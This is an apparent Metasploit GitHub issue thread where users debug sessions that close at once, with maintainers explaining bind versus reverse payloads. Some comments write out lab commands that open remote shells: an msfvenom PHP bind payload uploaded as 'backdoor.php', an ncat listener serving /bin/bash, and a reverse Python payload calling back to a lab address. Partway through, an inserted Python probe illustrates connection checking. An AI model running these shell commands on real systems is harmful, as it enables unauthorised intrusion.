Session continually dies immediately #9047
Comments
That should never work in the first place... There's no rhost on the bind payload (the payload binds on the rhost and we connect to the bound address:port). Not familiar with the proxy software you're using, but suggest a simple direct network link to a VM to sort this out, no VPN, no proxy, just TCP/IP. |
Thank you sempervictus for replying. I'm not gonna lie, I don't understand, but that's not your fault or problem. At least I know what to research now. |
Good attitude, sorry for the word jumble. To get you started: |
It's just a test box so I've run the exploit without anything in between but it just doesn't work. I don't understand what's so damn difficult. I have no prob getting an os-shell with sqlmap, why does metasploit have to be any different in terms of connections? I get reverse shells. You set up a listener then connect from a remote host. I don't understand what I could have done differently to get it to bind. I set the rhost where it said rhost. Set the lhost where it said lhost. Every single walkthrough from Offensive Security comes from the perspective that you're attacking inside the lan. How common is that really though? If you're doing an external pentest by virtue you have to be coming from the wan. Inside lan is easy. Outside lan is hard, don't know why there can't be more examples over the wan. I'm giving up on metasploit. It's just infuriating me at this point, like literally bringing me to tears. It's never worked for me once. I can do pretty much everything metasploit can manually but metasploit would def be a help. I'll just wait until I can have someone show me in person because there's no sense in me being upset over it and wasting hours and hours and hours of my time. Thank you for your help however, I do greatly appreciate it. |
This sounds like an area that is much in need of a specific tutorial. Don't despair, it is possible. But it does sometimes require some expert-level consideration of all of the moving parts, especially since a bind handler assumes the remote host is actually routable via RPORT and doesn't already have another service listening on that port. For instance, if you are already running a webserver on port 80, trying a bind payload on that target is going to show exactly the symptoms you see here. Metasploit will connect to your webserver when the handler starts, and say 'Session Established' and then dump a payload to your webserver. When the webserver says 'go away', that will look like the session died, when in fact, it could never even connect in the first place (in other words, the 'Session Established' message is a bit of a lie at first, since it only counts TCP connections rather than real communications as success.) I think we could take this as a cue to improve docs and user output when things are misconfigured, and especially verify that the session is real before claiming success. I'll close this for now. |
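The failure mode described in the comment above, reproduced on loopback as an added example (not code from this thread or from Metasploit): a completed TCP connect only proves that something accepted the connection, so the probe reports success only after the peer answers a handshake. The `HELLO`/`ACK` nonce exchange, the function names and the stand-in services are assumptions made for this illustration.

```python
import os
import socket
import threading

def probe(host, port, timeout=2.0):
    """Classify one attempt. HELLO/ACK is a hypothetical handshake, not MSF's."""
    nonce = os.urandom(8).hex()
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "refused"              # nothing is listening (or it is filtered)
    with sock:
        try:
            sock.sendall(f"HELLO {nonce}\n".encode())
            reply = sock.makefile("rb").readline(256)
        except OSError:               # reset or timeout after the TCP connect
            return "tcp-only"
    return "verified" if reply == f"ACK {nonce}\n".encode() else "tcp-only"

def serve_once(handler):  # one-connection loopback listener; returns its port
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def run():
        conn, _ = srv.accept()
        with conn, srv:
            handler(conn)
    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]

def web_like(conn):
    """Constructed stand-in for an unrelated service already on the port."""
    conn.recv(1024)
    conn.sendall(b"HTTP/1.1 400 Bad Request\r\n\r\n")

def expected_peer(conn):
    """Constructed stand-in for the peer that speaks the handshake."""
    line = conn.makefile("rb").readline(256)
    if line.startswith(b"HELLO "):
        conn.sendall(b"ACK " + line[6:])

def closed_port():
    with socket.socket() as s:        # bind, read the port, release it
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

if __name__ == "__main__":
    for port in (closed_port(), serve_once(web_like), serve_once(expected_peer)):
        print(port, probe("127.0.0.1", port))
```

The `tcp-only` result is the case the comment calls "a bit of a lie": the connect succeeded, but the service on the port was never the expected peer.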
Well, this issue is the same one I have but under different conditions, therefore I'm gonna use this one: msf version is v4.16.11-dev, so I set my reverse handler and I get: [] [2017.10.21-13:31:29] Started reverse TCP handler on 0.0.0.0:443 It seems I can't get a working session, I tried the same on msf v4.12.4-dev and it's working perfectly. Any ideas? |
Bcook-rc7: A specific tutorial would be amazing!!! Thanks so much for your time and understanding. You know what'd also be awesome is if rather than having two LHOSTS (one for listener, one for connect back), the listening one were called LIHOST. Then it'd be easier to understand. I think that's where a lot of people get hung up at. Obviously I'm nowhere near the level you're at and it's likely super easy for you to know the difference. I'll read about how to set the LHOSTS properly but it doesn't connect with my brain. I'll have to do something successfully to understand then reverse engineer in my head why it worked. Thanks again for your assistance! |
For reverse_tcp you can set the LHOST to the address the payload should connect out to (the same LHOST you have given to msfvenom). If it can't bind to the address it will fall back to binding on all interfaces (0.0.0.0). There are advanced options for overriding this (ReverseListenerBindAddress I think). |
Having the same issue 4.16.12-dev, it's driving me nuts. Trying a php exploit, revslider, settings are correct, the file gets dumped into the web server, but my meterpreter session immediately dies, "Reason: died". So I msfvenom my own .php file - msfvenom -p php/meterpreter/bind_tcp LPORT 4000 >/temp/backdoor.php - upload that, log into my virtual machine running 5 year old ubuntu and 5 year old wordpress plus plugins, file is there, start a listener: use exploit/multi/handler. The second I open up the /wordpress.../backdoor.php file, I get the same immediate session closed. IP address and ports have to be right, I can hit enter, start a new listener, and then refresh the php file on my browser and it does the same thing. sending state to 172.16.1.16 I am running Kali in virtualbox, Arch Linux the host. Tested it in Windows 10, Kali VM, same issue. Any help would be appreciated. |
You're handling a reverse payload while binding on the host. Bind payloads listen on a port of the target host, they bind to the port. Reverse payloads connect back to you.
|
Sorry, thanks for the close read. I'm using set payload php/meterpreter/bind_tcp. I was typing it all out on the machine that's actually logged into git, not doing the work, which was dumb. I went ahead and created a reverse payload, started a reverse listener, exact same thing. Initiated immediately, but died. |
No worries. So if you are using a bind payload, can you netcat to the bound port? Php itself may also be messing w you, suggest trying a separate bind shell for testing that factor.
|
Ok, trying to follow along. ncat -v -l -p 4000 -e /bin/bash on my ubuntu target I used msfvenom to create a .py payload, moved it over (exploit changes it to php file, didn't feel like troubleshooting) and same thing, listener starts and waits, just dies. msfvenom -p cmd/unix/reverse_python lhost=10.9.8.2 lport=4000 -f raw > python.py --> cp file use exploit/multi/handler ./python.py on the target as root, handler opens the session and immediately dies. edit: if I'm supposed to be able to nc to port 4000 after I run the exploit, if I don't click the exploit, the connection is refused, if I time it just right, click the exploit and then nc, it appears to work but the session doesn't get established. edit2: I have no problem getting windows exploits to work, and have successfully tested a cmd/unix/interact payload, |
You mismatched payloads. Let's make an analogy. |
Thanks, fixing the handler to use the right exploit took 15 seconds and worked. ncat works, this python shell file works, is there any way to further troubleshoot php? Or should I try other things? I am running into some base64 issue when I tried to run a msfvenom'd python/meterpreter/reverse_tcp file. Is that a trail worth going down? |
I took the python script out of base64, easier to manually kick off on my testing target machine that way. Ran python/meterpreter/reverse_tcp for a listener, and that worked as well. Appreciate everyone's help, I can get anything but php to work. I don't know if it's my VPN or my virtualbox or just the latest builds of msf. |
@chris948: Re PHP, you might want to trace the PHP execution via print
statements injected into your payload. How does PHP reverse shell behave,
drop the meterp piece for a sec, and try the raw TCP sock connecting back
to you with a REPL on the other side.
--
Boris Lukashev
Systems Architect
Semper Victus
|
This is a closed ticket. If you found a bug in the code, please submit a new ticket. If you need help with metasploit, please visit the #metasploit Chan on IRC |
Thanks, the guy who posted the problem before me has another thread, and that one was closed because his php issue is fixed with the latest merge (v4.16.13-dev). I'm not on the git release, so I'm just waiting for kali to put it in apt, I think that addresses my issue. If that doesn't work, I'll learn enough php to print! |
@h00die: my fault for keeping the closed issue alive, a bit heads down
lately to be useful in IRC.
@chris948: real <insert relevant pronoun> don't use packaged installers ;-).
MSF is a framework, not so much a precanned tool (get Pro/CE for that), and
with your own deployment from git you can customize beyond the capabilities
presented by upstream.
--
Boris Lukashev
Systems Architect
Semper Victus
|
hey, |
I have a few issues:
I. Once getting a session, it immediately dies
Logistics
I am using Private Internet Access VPN (but have the exact same issue when not using it)
My LAN ip is 10.65.10.6
I'm using Ngrok as a means to port forward
Settings in metasploit
So I run again:
[-] Invalid session identifier: 2
Now it says 'invalid session identifier'
When I am able to get a shell in Metasploit community, when I click on 'command shell' it opens and I'm given a message the session has been disconnected as well as this input:
II
Only on Armitage and Metasploit Community edition am I told when a successful session has been established. I can establish a session using msfconsole but will get the 'no session created' message even when a successful session had been established.
Further, I have to run the exploit several times with the same settings to get it to work and give me a session.
Any help would be greatly appreciated! I've been struggling with this for weeks and have a jaw dropping 93 closed sessions on the target. I am running the latest distribution of Kali Linux as my OS (not a VM) and have updated Metasploit.